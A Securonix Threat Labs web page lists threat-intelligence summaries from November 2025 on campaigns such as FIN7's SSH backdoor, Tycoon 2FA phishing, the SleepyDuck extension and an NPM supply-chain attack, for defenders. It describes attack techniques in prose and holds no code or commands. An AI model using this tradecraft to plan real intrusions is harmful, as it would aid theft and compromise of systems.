Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Learn More

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

Intel Source:: Twitter

Intel Name:: Windows_SSH_backdoor

Date of Scan:: 2025-11-08

Impact:: MEDIUM

Summary:: PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. This campaign leverages legitimate OpenSSH components along with a batch script to automate deployment and establish covert communication channels between compromised hosts and attacker-controlled servers. By exploiting legitimate SSH protocols, FIN7 establish encrypted reverse SSH and SFTP connections that seamlessly blend with legitimate administrative traffic, making detection highly challenging. The backdoor facilitates persistent remote access, lateral movement, and data theft while leaving minimal forensic traces within security logs.

Source: https://x.com/PRODAFT/status/1985731361492050255

Intel Source:: ASEC researchers

Intel Name:: Beast_Ransomware_Hidden_in_GUI

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched their Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, they had publicly named 16 victims across North America, Europe, Asia, and Latin America, targeting multiple sectors such as manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI interface, and advanced anti-recovery mechanisms, making decryption nearly impossible without the attackers’ key."

Source: https://asec.ahnlab.com/en/90792/

Intel Source:: ASEC researchers

Intel Name:: Rhadamanthys_Malware

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a legitimate Ren’Py visual novel game, a Python-based open-source game engine used by indie developers and available on platforms like Steam. The attackers embed the malware into the game’s script files so that when users run what appears to be a harmless game executable, the malicious loader activates and installs Rhadamanthys in the background. This campaign leverages social engineering and gaming communities (especially free game forums and file-sharing sites like MediaFire) to infect unsuspecting users."

Source: https://asec.ahnlab.com/en/90767/

Intel Source:: Pulsedive

Intel Name:: Kimsuky_JavaScript_Dropper_Analysis

Date of Scan:: 2025-11-07

Impact:: HIGH

Summary:: Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain leveraging a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The investigation revealed that the dropper executes multiple stages, beginning with a lightweight JavaScript file responsible for retrieving and executing additional payloads from adversary infrastructure. The subsequent stage performs host reconnaissance by collecting system configuration details, running processes, and directory listings, which are then compressed and transmitted to the attacker’s command server. The malware further modifies Windows registry keys and creates scheduled tasks to maintain continuous execution, ensuring the dropper remains active even after reboot.

Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/

Intel Source:: AhnLab SEcurity intelligence Center

Intel Name:: ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire

Date of Scan:: 2025-11-06

Impact:: LOW

Summary:: "Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604) to infect both Linux and Windows systems. The attackers use this flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter for system control and post-exploitation. This marks a shift in Kinsing’s activity—from simple cryptocurrency mining to full system compromise and remote control—making it a more serious and versatile threat."

Source: https://asec.ahnlab.com/en/90811/

Intel Source:: Cybereason

Intel Name:: Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit

Date of Scan:: 2025-11-06

Impact:: HIGH

Summary:: Researchers at Cybereason have identified Tycoon 2FA, a sophisticated Phishing-as-a-Service (PhaaS) kit active since August 2023 that using a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts by intercepting credentials and session cookies in real time for full account compromise. The kit delivers phishing links via PDFs, PowerPoint, SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks prior to redirection to evade automated analysis. Its multi-stage JavaScript chain employs base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution, it gathers user-agent and geolocation data, encrypts the data with hardcoded AES keys, and transmits it via AJAX POSTs to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to legitimate servers while dynamically rendering authentic error messages and MFA prompts, making the phishing flow nearly indistinguishable from real logins and the kit’s adaptive design tailors attacks to victims’ authentication policies.

Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis

Intel Source:: Cyberwarzone

Intel Name:: SleepyDuck_VSX_Ethereum_Based_C2_Malware

Date of Scan:: 2025-11-06

Impact:: HIGH

Summary:: Researchers at Secure Annex have identified a malicious Visual Studio Extension (VSX) known as SleepyDuck that employs the Ethereum blockchain for command-and-control (C2) operations. Distributed through the Open VSX registry under the guise of a legitimate Solidity development tool, the extension was modified in early November 2025 to include remote access trojan capabilities. Once installed, SleepyDuck connects to Ethereum smart contracts to dynamically update its C2 configuration, making takedown and detection significantly more difficult. The malware periodically polls for new commands, exfiltrates host and user information, and maintains fallback mechanisms using multiple Ethereum Remote Procedure Call (RPC) endpoints to ensure persistence.

Source: https://cyberwarzone.com/2025/11/04/malicious-vsx-extension-sleepyduck-leverages-ethereum-for-command-and-control/

Intel Source:: Cyble

Intel Name:: SSH_Tor_Backdoor_Target_Defence_Sector

Date of Scan:: 2025-11-05

Impact:: MEDIUM

Summary:: Researchers at Cyble have identified a phishing campaign that deploys an SSH-over-Tor backdoor via military-themed lures and weaponized archives. The attack chain is initiated by a malicious .LNK shortcut that executes PowerShell, performs environment checks, stages additional payloads, and then presents benign-appearing decoy documents to minimize detection. Following installation, the implant establishes persistence through a scheduled task and installs OpenSSH alongside Tor components to conceal C2 infrastructure within Tor hidden services. Operators then expose multiple services—SSH, RDP, SMB and SFTP—over those hidden services, enabling full remote administration, credential harvesting, data staging and exfiltration, and lateral movement across the compromised environment.

Source: https://cyble.com/blog/weaponized-military-documents-deliver-backdoor/

Intel Source:: Group-IB

Intel Name:: Phishing_Campaign_Targets_NPM_Developers

Date of Scan:: 2025-11-05

Impact:: HIGH

Summary:: Group-IB researchers uncovered a phishing- based supply chain attack targeting the NPM ecosystem. The campaign began when threat actors compromised a developer’s NPM account by luring them to a fraudulent NPM login portal disguised as a legitimate 2FA update notification. Once the attacker gained full access, they modified around 20 widely used NPM packages to inject a malicious JavaScript-based crypto-clipper. The malware covertly monitored browser and application activity to detect cryptocurrency transactions and replaced legitimate wallet addresses with those controlled by the attackers, impacting multiple cryptocurrencies including Bitcoin, Ethereum, Solana, Tron, Litecoin, and Bitcoin Cash. The phishing emails impersonated official NPM Support communications, evading SPF, DKIM, and DMARC check while leveraging urgency to prompt user action. The compromised packages collectively received about 2.8 billion weekly downloads, underscore the significant potential impact.

Source: https://www.group-ib.com/blog/detect-npm-supply-chain-attack/

Intel Source:: Polyswarm

Intel Name:: MuddyWater_Phoenix_v4_Espionage_Campaign

Date of Scan:: 2025-11-05

Impact:: HIGH

Summary:: Researchers at PolySwarm have identified a new cyber-espionage campaign attributed to the Iran-linked APT MuddyWater, which is actively targeting government entities across the Middle East and North Africa. The operation employs phishing emails sent from compromised accounts accessed via NordVPN, delivering macro-enabled Word documents that execute a FakeUpdate injector to deploy the Phoenix backdoor version 4. Once executed, the malware establishes persistence through Winlogon registry modifications and enables remote access for data exfiltration and command execution. Analysis indicates that the attackers leverage Chromium-based credential stealers and remote monitoring tools such as PDQ and Action1, hosted on the same infrastructure, to maintain access and facilitate post-exploitation activities. Overlaps in macro code, C2 infrastructure, and tool usage link this operation to historical MuddyWater campaigns tied to Iran’s Ministry of Intelligence and Security (MOIS).

Source: https://blog.polyswarm.io/muddywater-targets-mena-governments-with-phoenix-backdoor

View All

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Visit Our Sigma Page